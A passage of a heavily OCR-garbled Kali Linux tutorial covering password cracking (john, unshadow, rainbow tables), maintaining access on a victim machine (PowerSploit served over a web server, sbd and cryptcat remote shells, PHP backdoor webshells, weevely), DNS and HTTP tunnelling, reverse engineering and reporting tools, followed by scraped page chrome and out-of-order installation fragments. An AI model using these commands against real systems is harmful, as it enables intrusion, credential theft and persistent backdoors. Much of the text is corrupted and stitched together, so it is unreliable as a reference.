r::~~===~~==~~~~~16333:0:99999:7:::
16216:0:99999:7'::
r---
47 bin 16216:0:99999:7:::
48 sys 16216:0:99999:7:::
149 sync 16216;0:99999:7:::
50 games 16216:0:99999:7:::
51 man t 16216:0:99999:7:::
16216:0:99999:7:::
john
john is a command line version of Johnny GUI. To start it, open the Terminal and
type “john”.
:--# john
John the Ripper password cracker, version 1_8_0_6-jumbo-1-bleeding [linux-x86-64-avx]
Copyright (c) 1996-2015 by Solar Designer and o tho rs
Homepage: htt p :!/W\vw _openwa 11 .com/ johri/
Usage: john [OPTIONS] [PASSWORD-FILES]

--single[=SECTION] "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--loopback[=FILE] like --wo rd'li s t , but fetch wo rds from a .pot fHe
--dupe-suppression suppress all dupes in wordlist (and force preload)
--prince[=FILE] PRINCE mode, read wo rds t rom FILE
--encoding=NAHE input encoding (eg. UTF-8, ISO-8859-1). See also
doc/ENCODING and --list=hidden-options.
--rules[=SECTION] enable word mangling rules fOI- wo rdlLs t modes
--inc rement a1 [=~IODE] "inc rement a1" mode [using sec tion I~ODE]
--mask=~IASK mask mode using MASK
--markov[=OPTIONS] "Ma rkov " mode (see doc /I~ARKOV)
--external=I~ODE external mode or wo rd f i lt s r
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
--restore[=NAME] restore an interrupted session [called NAME]
In case of unshadowing the password, we need to write the following command:
root@kali:~# unshadow passwd shadow > unshadowed.txt
99
Kali Linux
Rainbowcrack
The RainbowCrack software cracks hashes by rainbow table lookup. Rainbow tables are
ordinary files stored on the hard disk. Generally, Rainbow tables are bought online or can
be compiled with different tools.
To open it, go to Applications -> Password Attacks -> click “rainbowcrack”.
The command to crack a hash password is:
rcrack path_to_rainbow_tables -f path_to_password_hash
SQLdict
It is a dictionary attack tool for SQL server and is very easy and basic to be used. To open
it, open the terminal and type “sqldict”. It will open the following view.
100
Kali Linux
SQLdict
SQLdict 2.1 . The SQL Server Dictionary Attacker

copyright (e) 2000, Arne Vidsbom
arne. vidstrom@ntsec~ity. nu . http://ntsecurily. nu
Target server IP:
Target account
.!"oadPassword File
~tart S!oP
Under “Target IP Server”, enter the IP of the server holding the SQL. Under “Target
Account”, enter the username . Then load the file with the password and click “start” until
it finishes.
hash-identifier
It is a tool that is used to identify types of hashes, meaning what they are being used for.
For example, if I have a HASH, it can tell me if it is a Linux or windows HASH.
HASH: 098f6bcd4621d373cade4e832627b4f6
I
Possib1e Hashs:
[+] r~D5
[+] Domain Cached Credentia1s - MD4(MD4( ($pass)) .(strto1ower($username) ))
Least Possib1e Hashs:

[+] RAdmin v2.x
[+] NTU'l
[+] r~D4
[+] MD2
[ +] MD5 (Hr~AC)
[+ 1 MD4 (Hr~.lI.C)
[ +] MD2 (HMAC)
[+] MD5(HMAC(Wordpress))
[+] Hava1-128
[+] Hava1-128(HMAC)
[ +] RipeMD -128
The above screen shows that it can be a MD5 hash and it seems a Domain cached
credential.
101
12. Kali Linux ─ Maintaining Access Kali Linux
In this chapter, we will see the tools that Kali uses to maintain connection and for access
to a hacked machine even when it connects and disconnects again.
Powersploit
This is a tool that is for Windows machines. It has PowerShell installed in victims machine.
This tool helps the hacker to connect with the victim’s machine via PowerShell.
To open it, open the terminal on the left and type the following command to enter into the
powersploit folder:
cd /usr/share/powersploit/
If you type “ls” it will list all the powersploit tools that you can download and install in the
victim’s machine after you have gained access. Most of them are name self-explained
according to their names.
:-# cd /us r zshare/powe r-spt o.i t z

: "hl / ...11,,1 e- /1'" ,"1 ..." I" j t# Ls
Alii iv i r " ...BVi'1 ...... F',~, ... i ...
lt-''',.-' PowerSp1oit.psml i{t-'v.-'I"'r'Ei''iill'~t-'i il"1
'"rid x,', 'Itj"11 1'11",,1... READr"1E.rnd \( I i p t Hod i ! i . .i t i .«:
[xfilildli"i' PowerSp1oit.psdl F(!-""II
An easy way to download this tool on the victim’s machine is to create a web server, which
powersploit tools allow to create easily using the following command:
python -m SimpleHTTPServer
: /11-" f ..,Il.t[ ,. iI'''''!> I ..,,,1(, i i # python -m Simp1 eHTTPServe,-

-erving HTTP on 0.0.0.0 port 8000 ...
After this, if you type: http://<Kali machine ip_address>:8000/ following is the result.
• SOl)('
D trecto ry listing for I
• AnbVlrusBypassl
• CodeExecutlonl
• Exftltratlon!
• Persistence!
• PETools!
• PowerSplolt. psd 1
• PQwerSplolt psrol
• README rod
• Recon!
• ReyerseEngmeenngl
• $cnotModIOcatjon!
102
Kali Linux
Sbd
sbd is a tool similar to Netcat. It is portable and can be used in Linux and Microsoft
machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption> Basically, it helps to
connect to a victim’s machine any time on a specific port and send commands remotely.
To open it, go to the terminal and type “sbd -l -p port” for the server to accept
connections.
In this case, let us put port 44 where the server will listen.
:-# sbd -1 -p 44 -v
11stening on port 44
On the victim’s site, type “sbd IPofserver port”. A connection will be established where
we can send the remote commands.
In this case, it is “localhost” since we have performed the test on the same machine.
, ,
: --# sbd localhost 44
Finally, on the server you will see that a connection has occurred as shown in the following
screenshot.
connect to 127.0.0.1:44 from 127.0.0.1:57252 (localhost)
103
Kali Linux
Webshells
Webshells can be used to maintain access or to hack a website. But most of them are
detected by antiviruses. The C99 php shell is very well known among the antivirus. Any
common antivirus will easily detect it as a malware.
Generally, their main function is to send system command via web interfaces.
To open it, and type “cd /usr/share/webshells/” in the terminal.
: Ij",1 '!I II' ,I !l-,.!I' 11",# 15

1"'1' 1"'1' x ,I III 1"'1' I I, I 1 I 01III
: Ij"'l I ",11 II I ,I I!'-.Il! I I .#
As you see, they are divided in classes according to the programing language : asp , aspx,
cfm, jsp, perl,php
If you enter in the PHP folder, you can see all the webshells for php webpages.
:/'I~I '~I,,,r I 11.1'1,.,11,.11 php/~# cd

: /II~I !~",jr I Is
!,·,'~I,~II,·II..,!"llp#
flndsock.c php-l ind-,or k-..,Iwll. php qsd-php-backdoo r .php
php-bac kdoo r .php php-r ever ..,e-..,hell. php s Lmpl a-bec kdoo r .php
To upload the shell to a web server, for example “simple-backdoor.php” open the
webpage and URL of the web shell.
At the end, write the cmd command. You will have all the info shown as in the following
screenshot.
~MostVlSited" IiIOffensive Security "KaU Unux '\.KaU Docs 'KaLi Tools DExploit-DB •
Host Name:
OS Nau:
OS version:
OS Manufacturer: 10n
OS Configuration: Standalone Workstation
OS Build Type: Nul tiprocessor Free
Registered ~er:
Registered Organization:
grntfllr+ Tn.
Weevely
Weevely is a PHP web shell that simulate telnet-like connection. It is a tool for web
application post exploitation, and can be used as a stealth backdoor or as a web shell to
manage legit web accounts, even free hosted ones.
To open it, go to the terminal and type “weevely” where you can see its usage.
104
Kali Linux
To generate the shell, type “weevely generate password pathoffile”. As seen in the
following screenshot, it is generated on the “Desktop” folder and the file is to upload in a
webserver to gain access.
After uploading the web shell as shown in the following screenshot, we can connect with
cmd to the server using the command “weevely URL password” where you can see that
a session has started.
105
Kali Linux
http-tunnel
http-tunnel creates a bidirectional virtual data stream tunneled in HTTP requests. The
requests can be sent via a HTTP proxy if so desired. This can be useful for users behind
restrictive firewalls. If WWW access is allowed through a HTTP proxy, it’s possible to use
http-tunnel and telnet or PPP to connect to a computer outside the firewall.
First, we should create a tunnel server with the following command:
httptunnel_server –h
Then, on the client site type “httptunnel_client –h” and both will start to accept
connections.
dns2tcp
This is again a tunneling tool that helps to pass the TCP traffic through DNS Traffic, which
means UDP 53 port.
To start it, type “dns2tcpd”. The usage is explained when you will open the script.
:-H dns2tcpd
Usage: dns2tcpd [ -lIP 1 [ -F 1 [ -d debug_level 1 [ -f conflg-flle 1 [ -P p i d
f iIs J
. - -
On the server site, enter this command to configure the file .
#cat >>.dns2tcpdrc <<END

listen = 0.0.0.0
port = 53
user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
On Client site, enter this command.
# cat >>.dns2tcprc <<END

domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
Tunneling will start with this command.
106
Kali Linux
cryptcat
It is another tool like Netcat which allows to make TCP and UDP connection with a victim’s
machine in an encrypted way.
To start a server to listen for a connection, type the following command:
cryptcat –l –p port –n
: -# c ryptcat -1 -p 78 -n
I
Where,
 -l stands for listening to a connection

 -p stands for port number parameter
 -n stands for not doing the name resolution
On client site, the connection command is “cryptcat IPofServer PortofServer”

root@kali: N
oe c
:-# cryptcat 127.0.0.178
107
13. Kali Linux ─ Reverse Engineering Kali Linux
In this chapter, we will learn about the reverse engineering tools of Kali Linux.
OllyDbg
OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows applications.
Emphasis on binary code analysis makes it particularly useful in cases where the source is
unavailable. Generally, it is used to crack the commercial softwares.
To open it, go to Applications -> Reverse Engineering -> ollydbg
To load a EXE file, go the “Opening folder” in yellow color, which is shown in a red square
in the above screenshot.
After loading, you will have the following view where you can change the binaries.
108
Kali Linux
OllyObg ollydbg.eKe 0
ASt1t -st~ Of!- W\lt ••

~l? 96420A43 01 t~-db9.00420~3
_ e ES eezs 32bn GtFFFFf'FFF)
p 1 C$ eo
1 B '32b i~ to": FFF'FFf"FF)
A 9 $S '00:2:3 321),.
$1F1='FJ'm'FJ
z 1 OS 0023 ?2bj't: 61 mFFFFF»
-e FS- 8838 -zt,lf 7fTCIEOOeIFl-TI
e OS Q(tQB tf..Ll_
3 L~!tE!. eeeeeo66 O:ROJLIIfllAll!LHA

UL ~46
~TO
f1 .~'f~
.""tv
ST2 .~y
f .t\C>, ~
r"'1O.tllO.r..N.li5.PE.GC.lE:1
-lttDRI1 8191
.UtOAf1
.\lCJRf1
S£2:1
-uo:a1 OF'24,
I
0000000
FFFFf'F"F
0000000
0007B~
5T4I ~ty 3. 1414 -4932
TG fN)t.., 1536.
It. .~y SII.
T7 f"'f> .., Ci64.
dex2jar
This is an application that helps convert APK file (android) to JAR file in order to view the
source code. To use it, open the terminal and write ”d2j-dex2jar –d /file location”.
In this case, the file is “classes.dex” on the desktop.
The following line shows that a JAR file has been created.
109
Kali Linux
< )
Q. cLassts·d~x~.jar
--~============~------
iii Oesttql
D Oowmilnts
o 00wnI0Ids
n MusIC
jd-gui
JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files.
You can browse the reconstructed source code. In this case, we can reconstruct the file
that we extracted from the dex2jar tool.
To launch it, open the terminal and write “jd-gui” and the following view will open.
To import the file, click the open folder icon on the left upper corner and then import
the file.
Java Decompiler - javaversion.class
File Edit Navigate Search Help
I> ED .usr javaversion.class I!l

I> mm:tl'lrftll
<±l import java. io.PrintStream;
public class javayersion

{
public static void nain(String!) paramArrayOfString}
{
26 Systu. out. println (System. getProperty(' java. sped fication. Yersio,,'»;
}
}
110
Kali Linux
apktool
Apktool is one of the best tools to reverse the whole android application. It can decode
resources to nearly an original form and rebuild them after making modifications.
To open it, go to the terminal and write “ apktool”.
To decompile a apk file, write “ apktool d apk file”.
Decompilation will start as shown in the following screenshot.

I: U-::,lng :'pkt'Jol ~'.cl.~:·r..'=4 Jr ._j~!-..
1: LoaJir'lg r~sourL~ ta~l~ ...
I: Oecodlr~~ Ar~dr·CldMar-'lf~st.·~l ~l~t'l r·~sou'·C~S...
I: Loading resourre ta~le fro~ fll~: r00:lar~tool frame~ork l.apk
I: Regular manifest ra(~a;e .
I: DecodIng fIle·resou·ces .
I : D~(_odintJ value-; •• ,··1~s .
l : 803' Sill."I i n.: c l "SS'"~ . J-o' •..
111
14. Kali Linux ─ Reporting Tools Kali Linux
In this chapter, we will learn about some reporting tools in Kali Linux.
Dradis
In all this work that we have performed, it is important to share the results that was
produced, to track our work, etc. For this purpose, Kali has a reporting tool called dradis
which is a web service.
Step 1: To start Dradis, type “service dradis start”.
:-# service dradis start

:-#
, -' ••••• /.t'jl .-"//. ",//" .".z-. "'.1'.1 .. .1 //_ .. 11"/1 ...... r » '/.'" J
Step 2: To open, go to Applications -> Reporting Tools -> dradis.
The web URL will open. Anybody in LAN can open it in the following URL https://IP of kali
machine:3004
112
Kali Linux
Log in with the username and password that was used for the first time.
weteeme to Oradi$ - ICOWQ;)$ol
Wetcome to Dradis
.. [a http' 1Z7 0.0. t 1004/'.'<lon, .M: V e lElv (;009'.

IDMo,tVisitedv gOffenoive Security ,Kali Unux ,Kati Docs DExploit-DS ~Ail(rad<-n9
--------------------------
Server password
This server does nOI have a password yel. please Sel up one
Password
Confirm Password
Meta·Server
You can create a new project or checkout one trom the Meta·Seover.
New project @
Checkout project 0
Step 3: After logging in, you can import files from NMAP, NESSUS, NEXPOSE. To do so,
go to “Import from file” -> click “new importer(with real-time feedback)”.
113
Kali Linux
Step 4: Select the file type that you want to upload. In this case, it is “Nessus scan” ->
click “Browse”.
Upload Manager
I.M tilt' fcnll below co;f:"4 CIUtI).A. tIt$ .. 0CWf 1OOb. eeee 'JIOI' ~ ~ tbeM,oll CIIrI ~0«1l 'III'Ith IlIt
dl1ItmIC. plL4!M ""1(1' ..
If you go to the home page now, on the left panel you will see that the imported scans
have are in a folder with their host and port details.
·eo_
·s_
.• _,_Lt.
..... _"t:Ii!
......_
.......
.---
...
UIO
•• """,,',10'
--
,., ,,101Jkp .. OC*I (qon«k)
...........,
Metagoofil
Metagoofil performs a search in Google to identify and download the documents to the
local disk and then extracts the metadata. It extracts metadata of public documents
belonging to a specific company, individual, object, etc.
To open it, go to: “usr/share/metagoofil/”.
-# cd /usr/shar~/m~tagoofll/
Ill -, ' / -, 11011 1/1111'1 .ICiIH>1 i 1# pyl
114
Kali Linux
To start searching, type the following command:
python metagoofil.py
You can use the following parameters with this command:
 –d (domain name)
 –t (filetype to download dox,pdf,etc)
 –l (limit the results 10, 100 )
 –n (limit files to download)
 –o ( location to save the files)
 –f (output file)
The following example shows only the domain name is hidden.
115

Bilal Ahmed Shaik Kali Linux

Загружено:

Сведения о документе

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Bilal Ahmed Shaik Kali Linux

Загружено:

Авторское право:

Доступные форматы

1.

Kali Linux – Installation & Configuration

Generally, Kali Linux can be installed in a machine as an Operating System, as a virtual

Our Most Advanced Penetration Testing Distribution, Ever.

To install Kali Linux ─

 First, we will download the Virtual box and install it.

 Later, we will download and install Kali Linux distribution.

Download and Install the Virtual Box

Step 1: To download, go to https://www.virtualbox.org/wiki/Downloads. Depending on

Step 2: Click Next.

~ Oracle VM VirtualBox 5.1.2 Setup

Welcome to the Oracle VM

The Setup Wizard will nstan Orade VM VirtualBox 5.1. 2 on

Version 5. 1.2 ( ~ext > :J ~el I

i%I Orecle VM Virtu_IBox 5.1.2 Setup

Orade VMVirtualBox 5.1.2

location: C:'Program A1es\Orade\Virtuallox\ Browse

Version 5.1.2 Disk Usage < Bade II Next> cancel

Pleasechoose from Ihe options below:

o Create a shortcut nlhe Quide launch Bac

Version 5. 1.2 I <Il.adc II ~ext> I I s;Ancel I

Step 5: Click Yes to proceed with the installation.

Instalng the Oracle VM Vi'tuaIBox 5.1.2 Nelw<lrtcing featl.l:e

Proceed .. th nstalation now?

Step 6: The Ready to Install screen pops up. Click Install.

Version 5.1.2 < Il.~c:k I[·..

Step 7: Click the Finish button.

1M! Oracle VM VirtualBox 5.1.2 Setup

Oracle VM VirtualBox 5.1.2

C6ck the Fmish button to exit the Setup Wizard.

~ Start Orade VM VirtualBox 5.1. 2 after installation

Version 5.1.2 < Back 1!,__Fil11_'sh_-, Cancel

t) Oracle VM Virtual Box Manager

file Machine !::!elp

You can press the f1key to get instant help, or visit

Install Kali Linux

_11® Blog Courses Certifications Online labs

Image Name Torrent Size Version SHA1Sum

Kali Linux 64 bit VM 1 Torrent 2.OG 2016.1 2b49bfle77cllecb5618249ca69a46f23a6f5d2d

Step 2: Click VirtualBox -> New as shown in the following screenshot.

9 Omdo VM ~onwISo. MlnagCl

[GQ Clone. CtJI·O I!I toe ...... 1

(I Please choose a virtual hard disk file x

Orqanize v New folder m--· ITI G

~ Pictures ~ Kali-Linux-2015.1-vm-amd64-s005 2/1/2015 S:18 PM Virtual Machine Di .

{- Create Virtual Machine

Name and operating system

Name: IKali 2016.1. 1

o Do not add a virtual hard disk

o Create a virtual hard disk now

® Use an existing virtual hard disk file

KaIH.lnux-2016.1·vm-amd6~.vmdk (NonMI. 3O.00G8)

Q.idod Mode II ere.te II Cancel _j

I. _. -!' jf fIt"" • j I:.'

[ , ,~I II' •• l' .. ; ,I I ro

Step 4: To upgrade to a newer version of Operating System, type “apt-get dist-

Step 1: Download Metasploitable, which is a Linux machine. It can be downloaded from

Metasploitable - Virtual Machine to Test Metasploit

".-."-C!I"",,(lN,ltJ (11w ~ ..... ...........,.. ~

OownloM , ••• ~,...

Thank you for registering for Metasploitable

To download Metasptoltal>te. dick here!

Do you have a ~opy of ~asptoll 10 US(! .ga''''1

Step 3: Click VirtualBox -> New.